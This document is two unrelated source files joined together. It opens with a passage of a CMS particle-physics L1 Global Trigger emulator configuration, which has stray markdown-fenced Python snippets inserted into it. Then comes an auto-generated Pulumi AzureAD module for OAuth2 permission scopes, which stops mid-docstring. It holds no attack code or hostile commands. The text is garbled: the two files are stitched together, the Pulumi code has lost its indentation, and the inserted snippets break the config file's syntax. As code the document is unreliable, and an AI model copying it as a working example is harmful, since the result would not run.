'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F877786C-C81C-DD11-9DBE-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F8EA1087-CA1C-DD11-BBC5-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FAB1D0DA-BB1C-DD11-BB67-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FC2172D3-D21C-DD11-B9FB-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FCAB7B9D-CA1C-DD11-942F-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FE771D08-BE1C-DD11-A65E-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8AC4D-C61C-DD11-A404-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8DB1D-C21C-DD11-96E7-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FED38120-C21C-DD11-8253-001617C3B5D8.root']
# configuration
#
process.load("Configuration.StandardSequences.FakeConditions_cff")
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load("L1Trigger.Configuration.L1Config_cff")
# L1 menu
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.lumi1x1032.L1Menu_CRUZET200805_gr7_muon_cff")
# RawToDigi all data
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
# Global Trigger emulator
import L1Trigger.GlobalTrigger.gtDigis_cfi
process.l1GtEmulDigis = L1Trigger.GlobalTrigger.gtDigis_cfi.gtDigis.clone()
# block GCT input and the technical triggers (only FDL and GMT active)
process.l1GtParameters.DaqActiveBoards = 0x0105
# block GMT input (0xdd12)
#process.l1GtParameters.DaqActiveBoards = 0x00FF
# block both GCT and GMT (FDL and techTrig active)
#process.l1GtParameters.DaqActiveBoards = 0x0003
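# Aside: the DaqActiveBoards values above are plain bit masks over the board
# list, one bit per board. A standalone sketch (not part of this
# configuration) of which bit positions each alternative sets:

```python
# List the set bit positions (LSB = bit 0) of a 16-bit DaqActiveBoards mask.
def set_bits(mask):
    return [i for i in range(16) if mask & (1 << i)]

print(set_bits(0x0105))  # mask set above
print(set_bits(0x00FF))  # the GMT-input-blocked variant
print(set_bits(0x0003))  # the FDL-and-techTrig-only variant
```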
# input tag for GMT readout collection:
process.l1GtEmulDigis.GmtInputTag = 'gtDigis'
# input tag for GCT readout collections:
#process.l1GtEmulDigis.GctInputTag = 'gctDigis'
# logical flag to produce the L1 GT DAQ readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtDaqRecord = False
# logical flag to produce the L1 GT EVM readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtEvmRecord = False
# logical flag to produce the L1 GT object map record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtObjectMapRecord = False
# logical flag to write the PSB content in the L1 GT DAQ record
# if true, write the PSB content in the record (default)
#process.l1GtEmulDigis.WritePsbL1GtDaqRecord = False
# logical flag to read the technical trigger records
# if true, read all available records via getMany (default)
#process.l1GtEmulDigis.ReadTechnicalTriggerRecords = False
# number of "bunch crossing in the event" (BxInEvent) to be emulated
# symmetric around L1Accept (BxInEvent = 0):
# 1 (BxInEvent = 0); 3 (F 0 1) (standard record); 5 (E F 0 1 2) (debug record)
# even numbers (except 0) "rounded" to the nearest lower odd number
# negative value: emulate TotalBxInEvent as given in EventSetup
#process.l1GtEmulDigis.EmulateBxInEvent = 3
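# The "rounded to the nearest lower odd number" rule described above can be
# sketched as follows (illustration only, not part of this configuration):

```python
# Effective number of BxInEvent: positive even values (except 0) fall back
# to the next lower odd number, so the window stays symmetric around BX 0.
def effective_bx_in_event(n):
    if n <= 0:
        return n  # negative: taken from the EventSetup; 0 left unchanged here
    return n if n % 2 == 1 else n - 1

print(effective_bx_in_event(3))
print(effective_bx_in_event(4))
```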
# Global Trigger report
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportData = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportData.L1GtRecordInputTag = 'gtDigis'
#
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportEmul = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportEmul.L1GtRecordInputTag = 'l1GtEmulDigis'
#
# compare the L1 GT data and emulator digis
process.load("L1Trigger.GlobalTriggerAnalyzer.l1GtDataEmulAnalyzer_cfi")
process.l1GtDataEmulAnalyzer.L1GtEmulInputTag = 'l1GtEmulDigis'
# path to be run
process.p = cms.Path(process.RawToDigi*process.l1GtEmulDigis*process.l1GtDataEmulAnalyzer*process.l1GtTrigReportData*process.l1GtTrigReportEmul)
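# Aside: the '*' between modules in cms.Path is operator overloading that
# builds an ordered sequence. A toy standalone sketch of the idea (NOT the
# real FWCore classes; the names here are made up):

```python
# Toy module type whose '*' operator concatenates execution order.
class ToyModule:
    def __init__(self, name):
        self.sequence = [name]

    def __mul__(self, other):
        combined = ToyModule('')
        combined.sequence = self.sequence + other.sequence
        return combined

path = ToyModule('RawToDigi') * ToyModule('l1GtEmulDigis') * ToyModule('l1GtDataEmulAnalyzer')
print(path.sequence)
```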
# services
# Message Logger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.enable = False
process.MessageLogger.cout = cms.untracked.PSet(
    enable = cms.untracked.bool(True),
    threshold = cms.untracked.string('INFO'),
    INFO = cms.untracked.PSet(
        #limit = cms.untracked.int32(-1)
        limit = cms.untracked.int32(1000)
    )#,
    #threshold = cms.untracked.string('DEBUG'), ## DEBUG
    #DEBUG = cms.untracked.PSet( ## DEBUG, all messages
    #
    #    limit = cms.untracked.int32(-1)
    #)
)
process.MessageLogger.debugModules = ['l1GtEmulDigis', 'l1GtDataEmulAnalyzer']
# histogram service
process.TFileService = cms.Service("TFileService",
    fileName = cms.string('L1GtDataFromRawEmulAnalyzer.root')
)
# summary
process.options = cms.untracked.PSet(
    wantSummary = cms.untracked.bool(True)
)
# output
process.outputL1GtDataEmul = cms.OutputModule("PoolOutputModule",
    fileName = cms.untracked.string('testGt_DataFromRawEmulAnalyzer_output.root'),
    outputCommands = cms.untracked.vstring('drop *',
        'keep *_l1GtDataDigis_*_*',
        'keep *_l1GtEmulDigis_*_*',
        'keep *_l1GctDataDigis_*_*')
)
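# Aside: each keep/drop pattern is matched against the four-field branch name
# ClassName_moduleLabel_productInstance_processName, with later commands
# overriding earlier ones. A rough standalone illustration with fnmatch
# (approximate only: here '*' also matches across underscores):

```python
import fnmatch

# Decide whether a branch is kept: the last matching command wins.
def kept(branch, commands):
    keep = False
    for cmd in commands:
        action, pattern = cmd.split(None, 1)
        if fnmatch.fnmatch(branch, pattern):
            keep = (action == 'keep')
    return keep

commands = ['drop *', 'keep *_l1GtEmulDigis_*_*']
print(kept('L1GlobalTriggerReadoutRecord_l1GtEmulDigis__PROD', commands))
print(kept('FEDRawDataCollection_source__PROD', commands))
```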
process.outpath = cms.EndPath(process.outputL1GtDataEmul)
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ApplicationOauth2PermissionScopeArgs', 'ApplicationOauth2PermissionScope']
@pulumi.input_type
class ApplicationOauth2PermissionScopeArgs:
def __init__(__self__, *,
admin_consent_description: pulumi.Input[str],
admin_consent_display_name: pulumi.Input[str],
application_object_id: pulumi.Input[str],
type: pulumi.Input[str],
user_consent_description: pulumi.Input[str],
user_consent_display_name: pulumi.Input[str],
value: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ApplicationOauth2PermissionScope resource.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
pulumi.set(__self__, "admin_consent_description", admin_consent_description)
pulumi.set(__self__, "admin_consent_display_name", admin_consent_display_name)
pulumi.set(__self__, "application_object_id", application_object_id)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "user_consent_description", user_consent_description)
pulumi.set(__self__, "user_consent_display_name", user_consent_display_name)
pulumi.set(__self__, "value", value)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if is_enabled is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""is_enabled is deprecated: [NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""")
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if permission_id is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""permission_id is deprecated: [NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""")
if permission_id is not None:
pulumi.set(__self__, "permission_id", permission_id)
if scope_id is not None:
pulumi.set(__self__, "scope_id", scope_id)
@property
@pulumi.getter(name="adminConsentDescription")
def admin_consent_description(self) -> pulumi.Input[str]:
"""
Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_description")
@admin_consent_description.setter
def admin_consent_description(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_consent_description", value)
@property
@pulumi.getter(name="adminConsentDisplayName")
def admin_consent_display_name(self) -> pulumi.Input[str]:
"""
Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_display_name")
@admin_consent_display_name.setter
def admin_consent_display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_consent_display_name", value)
@property
@pulumi.getter(name="applicationObjectId")
def application_object_id(self) -> pulumi.Input[str]:
"""
The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "application_object_id")
@application_object_id.setter
def application_object_id(self, value: pulumi.Input[str]):
pulumi.set(self, "application_object_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userConsentDescription")
def user_consent_description(self) -> pulumi.Input[str]:
"""
Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
"""
return pulumi.get(self, "user_consent_description")
@user_consent_description.setter
def user_consent_description(self, value: pulumi.Input[str]):
pulumi.set(self, "user_consent_description", value)
@property
@pulumi.getter(name="userConsentDisplayName")
def user_consent_display_name(self) -> pulumi.Input[str]:
"""
Display name for the delegated permission that appears in the end user consent experience.
"""
return pulumi.get(self, "user_consent_display_name")
@user_consent_display_name.setter
def user_consent_display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "user_consent_display_name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Determines if the permission scope is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="permissionId")
def permission_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "permission_id")
@permission_id.setter
def permission_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_id", value)
@property
@pulumi.getter(name="scopeId")
def scope_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "scope_id")
@scope_id.setter
def scope_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope_id", value)
@pulumi.input_type
class _ApplicationOauth2PermissionScopeState:
def __init__(__self__, *,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApplicationOauth2PermissionScope resources.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
if admin_consent_description is not None:
pulumi.set(__self__, "admin_consent_description", admin_consent_description)
if admin_consent_display_name is not None:
pulumi.set(__self__, "admin_consent_display_name", admin_consent_display_name)
if application_object_id is not None:
pulumi.set(__self__, "application_object_id", application_object_id)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if is_enabled is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""is_enabled is deprecated: [NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""")
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if permission_id is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""permission_id is deprecated: [NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""")
if permission_id is not None:
pulumi.set(__self__, "permission_id", permission_id)
if scope_id is not None:
pulumi.set(__self__, "scope_id", scope_id)
if type is not None:
pulumi.set(__self__, "type", type)
if user_consent_description is not None:
pulumi.set(__self__, "user_consent_description", user_consent_description)
if user_consent_display_name is not None:
pulumi.set(__self__, "user_consent_display_name", user_consent_display_name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="adminConsentDescription")
def admin_consent_description(self) -> Optional[pulumi.Input[str]]:
"""
Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_description")
@admin_consent_description.setter
def admin_consent_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_consent_description", value)
@property
@pulumi.getter(name="adminConsentDisplayName")
def admin_consent_display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_display_name")
@admin_consent_display_name.setter
def admin_consent_display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_consent_display_name", value)
@property
@pulumi.getter(name="applicationObjectId")
def application_object_id(self) -> Optional[pulumi.Input[str]]:
"""
The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "application_object_id")
@application_object_id.setter
def application_object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_object_id", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Determines if the permission scope is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="permissionId")
def permission_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "permission_id")
@permission_id.setter
def permission_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_id", value)
@property
@pulumi.getter(name="scopeId")
def scope_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "scope_id")
@scope_id.setter
def scope_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userConsentDescription")
def user_consent_description(self) -> Optional[pulumi.Input[str]]:
"""
Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
"""
return pulumi.get(self, "user_consent_description")
@user_consent_description.setter
def user_consent_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_consent_description", value)
@property
@pulumi.getter(name="userConsentDisplayName")
def user_consent_display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name for the delegated permission that appears in the end user consent experience.
"""
return pulumi.get(self, "user_consent_display_name")
@user_consent_display_name.setter
def user_consent_display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_consent_display_name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
class ApplicationOauth2PermissionScope(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an OAuth 2.0 Permission Scope associated with an application.
> **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API.
## Example Usage
```python
import pulumi
import pulumi_azuread as azuread
example_application = azuread.Application("exampleApplication")
example_application_oauth2_permission_scope = azuread.ApplicationOauth2PermissionScope("exampleApplicationOauth2PermissionScope",
application_object_id=example_application.id,
admin_consent_description="Administer the application",
admin_consent_display_name="Administer",
enabled=True,
type="User",
user_consent_description="Administer the application",
user_consent_display_name="Administer",
value="administer")
```
## Import
OAuth2 Permission Scopes can be imported using the `object_id` of an Application and the `id` of the Permission Scope, e.g.
```sh
$ pulumi import azuread:index/applicationOauth2PermissionScope:ApplicationOauth2PermissionScope test 00000000-0000-0000-0000-000000000000/scope/11111111-1111-1111-1111-111111111111
```
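        The import ID is the application's object ID and the permission scope's ID joined by the literal `/scope/` segment. A small illustrative helper (hypothetical, not part of this SDK) that composes and splits that string:

        ```python
        def scope_import_id(application_object_id: str, scope_id: str) -> str:
            # Builds the "<application object ID>/scope/<scope ID>" string
            # expected by `pulumi import` for this resource type.
            return f"{application_object_id}/scope/{scope_id}"

        def parse_scope_import_id(import_id: str) -> tuple:
            # Inverse helper: recovers the two IDs from an import string.
            app_object_id, marker, scope_id = import_id.split("/")
            if marker != "scope":
                raise ValueError("unexpected import ID format")
            return app_object_id, scope_id
        ```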
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationOauth2PermissionScopeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an OAuth 2.0 Permission Scope associated with an application.
> **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API.
## Example Usage
```python
import pulumi
import pulumi_azuread as azuread
example_application = azuread.Application("exampleApplication")
example_application_oauth2_permission_scope = azuread.ApplicationOauth2PermissionScope("exampleApplicationOauth2PermissionScope",
application_object_id=example_application.id,
admin_consent_description="Administer the application",
admin_consent_display_name="Administer",
enabled=True,
type="User",
user_consent_description="Administer the application",
user_consent_display_name="Administer",
value="administer")
```
## Import
OAuth2 Permission Scopes can be imported using the `object_id` of an Application and the `id` of the Permission Scope, e.g.
```sh
$ pulumi import azuread:index/applicationOauth2PermissionScope:ApplicationOauth2PermissionScope test 00000000-0000-0000-0000-000000000000/scope/11111111-1111-1111-1111-111111111111
```
:param str resource_name: The name of the resource.
:param ApplicationOauth2PermissionScopeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationOauth2PermissionScopeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationOauth2PermissionScopeArgs.__new__(ApplicationOauth2PermissionScopeArgs)
if admin_consent_description is None and not opts.urn:
raise TypeError("Missing required property 'admin_consent_description'")
__props__.__dict__["admin_consent_description"] = admin_consent_description
if admin_consent_display_name is None and not opts.urn:
raise TypeError("Missing required property 'admin_consent_display_name'")
__props__.__dict__["admin_consent_display_name"] = admin_consent_display_name
if application_object_id is None and not opts.urn:
raise TypeError("Missing required property 'application_object_id'")
__props__.__dict__["application_object_id"] = application_object_id
__props__.__dict__["enabled"] = enabled
if is_enabled is not None and not opts.urn:
warnings.warn("""[NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""is_enabled is deprecated: [NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""")
__props__.__dict__["is_enabled"] = is_enabled
if permission_id is not None and not opts.urn:
warnings.warn("""[NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""permission_id is deprecated: [NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""")
__props__.__dict__["permission_id"] = permission_id
__props__.__dict__["scope_id"] = scope_id
if type is None and not opts.urn:
raise TypeError("Missing required property 'type'")
__props__.__dict__["type"] = type
if user_consent_description is None and not opts.urn:
raise TypeError("Missing required property 'user_consent_description'")
__props__.__dict__["user_consent_description"] = user_consent_description
if user_consent_display_name is None and not opts.urn:
raise TypeError("Missing required property 'user_consent_display_name'")
__props__.__dict__["user_consent_display_name"] = user_consent_display_name
if value is None and not opts.urn:
raise TypeError("Missing required property 'value'")
__props__.__dict__["value"] = value
super(ApplicationOauth2PermissionScope, __self__).__init__(
'azuread:index/applicationOauth2PermissionScope:ApplicationOauth2PermissionScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'ApplicationOauth2PermissionScope':
"""
Get an existing ApplicationOauth2PermissionScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
